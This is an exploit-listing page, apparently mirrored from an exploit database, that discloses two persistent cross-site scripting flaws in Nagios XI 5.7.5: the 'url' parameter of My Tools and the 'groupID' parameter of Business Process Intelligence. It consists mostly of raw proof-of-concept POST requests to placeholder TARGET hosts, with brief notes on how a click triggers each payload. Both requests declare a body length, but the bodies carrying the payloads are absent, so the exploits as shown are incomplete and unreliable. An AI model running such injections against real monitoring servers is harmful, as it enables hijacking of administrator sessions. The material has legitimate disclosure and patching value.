Nagios xi 5.7.5 multiple persistent crosssite scripting Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-01-21 |
Type : webapps |
Platform : php
This exploit / vulnerability Nagios xi 5.7.5 multiple persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
# Vulnerable Parameter : url
# POC
# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.
POST /nagiosxi/tools/mytools.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
Upgrade-Insecure-Requests: 1
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.
# Vulnerable Parameter : groupID
# POC
# Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload.
POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
Upgrade-Insecure-Requests: 1